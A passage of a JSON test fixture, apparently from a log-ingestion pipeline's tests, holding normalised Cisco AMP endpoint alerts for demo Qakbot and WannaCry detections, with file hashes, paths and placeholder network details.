"path": "/C:/Windows/SysWOW64/cmd.exe", + "hash": { + "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_3" + ], + "hash": [ + "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_3", + "hostname": "Demo_Qakbot_3" + }, + "event": { + "severity": 4, + "ingested": "2021-09-12T17:32:10.094059796Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1493058569636000800,\"timestamp\":1610633340,\"timestamp_nanoseconds\":636000000,\"date\":\"2021-01-14T14:09:00+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Critical\",\"start_timestamp\":1610633340,\"start_date\":\"2021-01-14T14:09:00+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. 
A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.\",\"short_description\":\"W32.Qakbot.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/Windows/SysWOW64/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4\"}}}}}", + "kind": "alert", + "start": "2021-01-14T14:09:00.000Z", + "action": "Cloud IOC", + "id": "1493058569636000800", + "category": [ + "file" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "02:2f:e0:10:03:5d", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Malicious", + "identity": {} + }, + "disposition": "Clean", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "02:2f:e0:10:03:5d" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "cloud_ioc": { + "short_description": "W32.Qakbot.ioc", + "description": "Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen." 
+ }, + "event_type_id": 1107296274 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T13:46:00.000Z", + "file": { + "hash": { + "sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Low_Prev_Retro" + ], + "hash": [ + "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Low_Prev_Retro", + "hostname": "Demo_Low_Prev_Retro" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:32:10.094061712Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772016730014000,\"timestamp\":1610631960,\"timestamp_nanoseconds\":611000000,\"date\":\"2021-01-14T13:46:00+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6264772016730013699\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}", + "kind": "alert", + "action": "Retrospective Quarantine", + "id": "6264772016730014000", + 
"category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "df:d1:ed:2d:c8:fc", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "df:d1:ed:2d:c8:fc" + ] + }, + "detection_id": "6264772016730013699", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648155 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T13:46:00.000Z", + "file": { + "name": "report.pdf.exe", + "path": "\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe", + "hash": { + "sha1": "5058b16a86beee96927371210b9a9f682976a50a", + "sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "md5": "48a0bf05b9706a00d2a0ff6260412f11" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Low_Prev_Retro" + ], + "hash": [ + "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "48a0bf05b9706a00d2a0ff6260412f11", + "5058b16a86beee96927371210b9a9f682976a50a" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_Low_Prev_Retro", + "hostname": "Demo_Low_Prev_Retro" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:32:10.094063595Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772016730014000,\"timestamp\":1610631960,\"timestamp_nanoseconds\":65000000,\"date\":\"2021-01-14T13:46:00+00:00\",\"event_type\":\"Retrospective 
Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D5221F6847-100.SBX.TG\",\"detection_id\":\"6264772016730013699\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\",\"sha1\":\"5058b16a86beee96927371210b9a9f682976a50a\",\"md5\":\"48a0bf05b9706a00d2a0ff6260412f11\"}}}}", + "kind": "alert", + "action": "Retrospective Detection", + "id": "6264772016730014000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.D5221F6847-100.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "df:d1:ed:2d:c8:fc", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "df:d1:ed:2d:c8:fc" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6264772016730013699", + "event_type_id": 553648147 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T13:45:59.000Z", + "file": { + "name": "Unconfirmed 762952.crdownload", + "path": "\\\\?\\C:\\Users\\rsteadman\\Downloads\\Unconfirmed 762952.crdownload", + "hash": { + "sha256": 
"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Low_Prev_Retro" + ], + "hash": [ + "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_Low_Prev_Retro", + "hostname": "Demo_Low_Prev_Retro" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:32:10.094065501Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772012435046000,\"timestamp\":1610631959,\"timestamp_nanoseconds\":940000000,\"date\":\"2021-01-14T13:45:59+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D5221F6847-100.SBX.TG\",\"detection_id\":\"6264772012435046402\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"Unconfirmed 762952.crdownload\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\Unconfirmed 762952.crdownload\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}", + "kind": 
"alert", + "action": "Retrospective Detection", + "id": "6264772012435046000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.D5221F6847-100.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "df:d1:ed:2d:c8:fc", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "df:d1:ed:2d:c8:fc" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6264772012435046402", + "event_type_id": 553648147 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "file": { + "hash": { + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094067388Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":724000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419214500913741862\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419214500913742000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": "6419214500913741862", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "file": { + "name": "mssecsvc.exe", + "path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "hash": { + "sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "md5": "db349b97c37d22f5ea1d1841e3c89eb4" + } + }, + "ecs": { + "version": "1.11.0" + }, 
+ "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094069286Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":366000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741862\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419214500913742000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.ED01EBFBC9-100.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419214500913741862", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "mssecsvc.exe", + "pid": 5580, + "hash": { + "sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "md5": 
"db349b97c37d22f5ea1d1841e3c89eb4" + } + }, + "@timestamp": "2021-01-14T13:43:32.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\WINDOWS\\tasksche.exe", + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094071156Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741859\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":5580,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419214500913742000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.ED01EBFBC9-100.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Malicious", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419214500913741859", + "event_type_id": 1090519054 + } + }, + "tags": 
[ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "file": { + "name": "mssecsvc.exe", + "path": "C:\\WINDOWS\\mssecsvc.exe", + "hash": { + "sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "md5": "db349b97c37d22f5ea1d1841e3c89eb4" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "user": { + "name": "user@testdomain.com" + }, + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094073050Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":210000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741858\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419214500913742000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.24D004A104-100.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419214500913741858", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "lsass.exe", + "pid": 708, + "hash": { + "sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "md5": 
"4e568dbe3fff1a0025eb432dc929b78f" + } + }, + "@timestamp": "2021-01-14T13:43:32.000Z", + "file": { + "name": "mssecsvc.exe", + "path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "hash": { + "sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "md5": "db349b97c37d22f5ea1d1841e3c89eb4" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094074914Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":194000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741855\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"